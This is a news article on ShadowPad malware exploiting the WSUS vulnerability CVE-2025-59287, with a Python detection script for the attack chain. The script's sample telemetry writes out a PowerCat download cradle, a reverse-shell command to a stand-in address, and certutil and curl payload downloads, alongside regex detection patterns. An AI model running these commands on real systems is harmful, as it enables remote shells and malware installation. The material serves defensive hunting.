ShadowPad Malware Exploits WSUS Vulnerability: A New Threat to Full System Access

A recently disclosed vulnerability in Microsoft Windows Server Update Services (WSUS) is being actively exploited to distribute the ShadowPad malware. According to the AhnLab Security Intelligence Center (ASEC), attackers are leveraging CVE-2025-59287 to gain initial access to servers with the WSUS role enabled.

After exploiting the vulnerability, the attackers use PowerCat, a PowerShell implementation of netcat, to obtain a reverse shell on the WSUS server. From that shell they download and install ShadowPad using built-in command-line tools such as certutil and curl. ShadowPad, first identified in 2017, is a modular backdoor frequently associated with Chinese state-sponsored operations and has long served as one of their primary espionage tools.

Microsoft previously issued a patch for CVE-2025-59287, a critical deserialization flaw in the WSUS server role that enables unauthenticated remote code execution with SYSTEM privileges. Exploitation began within days of the patch's release, targeting WSUS instances exposed to the internet. Beyond running the attacker's own code, the flaw lets intruders launch legitimate, already-present system tools for reconnaissance and further exploitation, which keeps the activity looking like ordinary administration.

In the observed intrusions, the attackers ran legitimate system utilities, such as "curl.exe" and "certutil.exe," to connect to external servers and download the ShadowPad components. Installation relies on DLL side-loading: a legitimate, signed executable is dropped alongside a malicious DLL carrying the name of a library that executable loads, so the ShadowPad loader runs inside a trusted-looking process.
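The chain described in the two paragraphs above (WSUS host process spawning a shell, a PowerCat download cradle, then certutil or curl fetching a payload) is something a detection engineer can hunt for in process-creation telemetry. The following Python is an added example, not code from ASEC's report or from this article. It runs over constructed Sysmon-style process-creation records; the process names, command lines, PIDs and the 198.51.100.23 address are all constructed for illustration. The only product-specific assumptions are that WSUS code executes inside WsusService.exe and inside the IIS worker (w3wp.exe) for the WsusPool application pool.

```python
"""Hunt process-creation telemetry for the WSUS -> shell -> LOLBin download chain.

Sample events below are constructed, not real logs; the remote address is taken
from the 198.51.100.0/24 documentation range.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Processes that host WSUS code. Neither should normally spawn a shell.
WSUS_HOSTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# certutil -urlcache ... -f <url> <file> is the classic LOLBin download pattern.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*https?://", re.I)
# curl writing an http(s) URL to disk (-o / -O / --output).
CURL_URL = re.compile(r"https?://", re.I)
CURL_OUTPUT = re.compile(r"(?:^|\s)(?:-o|-O|--output)(?:\s|$)")
# PowerCat invocation or the download cradle typically used to load it.
POWERCAT = re.compile(r"\bpowercat\b|\.DownloadString\(", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


def _name(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_wsus_host(ev: ProcEvent) -> bool:
    """WSUS service, or an IIS worker whose command line names the WsusPool app pool."""
    name = _name(ev.image)
    if name == "wsusservice.exe":
        return True
    return name == "w3wp.exe" and "wsuspool" in ev.command_line.lower()


def classify(ev: ProcEvent) -> List[str]:
    """Per-event indicators, emitted in a fixed order so results are comparable."""
    cl = ev.command_line
    image, parent = _name(ev.image), _name(ev.parent_image)
    findings = []
    # Any IIS worker or the WSUS service launching a shell is worth a look even
    # before the app pool is known, so the direct-parent check uses image only.
    if parent in WSUS_HOSTS and image in SHELLS:
        findings.append("wsus_spawned_shell")
    if image in SHELLS and POWERCAT.search(cl):
        findings.append("powercat_reverse_shell")
    if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cl):
        findings.append("certutil_download")
    if image == "curl.exe" and CURL_URL.search(cl) and CURL_OUTPUT.search(cl):
        findings.append("curl_download")
    return findings


def descends_from_wsus(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    """Walk the parent chain; True if any ancestor is a WSUS host process."""
    seen = set()
    pid = ev.ppid
    while pid in by_pid and pid not in seen:  # stops on missing or cyclic PIDs
        seen.add(pid)
        parent = by_pid[pid]
        if is_wsus_host(parent):
            return True
        pid = parent.ppid
    return False


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map PID -> findings for every event that triggers at least one indicator."""
    by_pid = {e.pid: e for e in events}
    report: Dict[int, List[str]] = {}
    for ev in events:
        findings = classify(ev)
        if findings and descends_from_wsus(ev, by_pid):
            findings.append("ancestor_is_wsus")
        if findings:
            report[ev.pid] = findings
    return report


CRADLE = ("powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
          ".DownloadString('http://198.51.100.23/powercat.ps1'); "
          "powercat -c 198.51.100.23 -p 4444 -e cmd\"")

# Constructed telemetry: one malicious chain under the WsusPool worker, two benign events.
SAMPLE_EVENTS = [
    ProcEvent(4200, 700, r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\svchost.exe",
              r'c:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0"'),
    ProcEvent(5100, 4200, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe",
              "cmd.exe /c " + CRADLE),
    ProcEvent(5120, 5100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe", CRADLE),
    ProcEvent(5200, 5120, r"C:\Windows\System32\certutil.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"certutil.exe -urlcache -split -f http://198.51.100.23/update.dat C:\ProgramData\Microsoft\update.dat"),
    ProcEvent(5210, 5120, r"C:\Windows\System32\curl.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"curl.exe -s -o C:\ProgramData\Microsoft\log.dll http://198.51.100.23/log.dll"),
    ProcEvent(6100, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe -NoProfile -Command Get-Service WsusService"),
    ProcEvent(6200, 3000, r"C:\Windows\System32\certutil.exe", r"C:\Windows\explorer.exe",
              r"certutil.exe -dump C:\Users\admin\cert.cer"),
]

if __name__ == "__main__":
    for pid, findings in analyze(SAMPLE_EVENTS).items():
        print(pid, ", ".join(findings))
```

Two caveats for anyone adapting this. First, the DLL side-loading step is invisible in process-creation events; catching it needs image-load telemetry (Sysmon Event ID 7) for DLLs loaded from the directory the downloader wrote to. Second, on a busy IIS host, alert on any w3wp.exe spawning a shell, but prioritize workers whose command line names the WsusPool application pool, as `is_wsus_host` does.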

Once installed, ShadowPad loads plugins to extend its functionality and uses anti-analysis and evasion techniques to remain resident on compromised hosts. The speed with which this vulnerability was weaponized underlines the need for prompt patching, and for keeping WSUS off the public internet, given how much damage a compromised update server can do.

AhnLab also noted that exploitation is particularly severe because it permits remote code execution with SYSTEM privileges, giving attackers full control of a server that the rest of the environment trusts to deliver software.
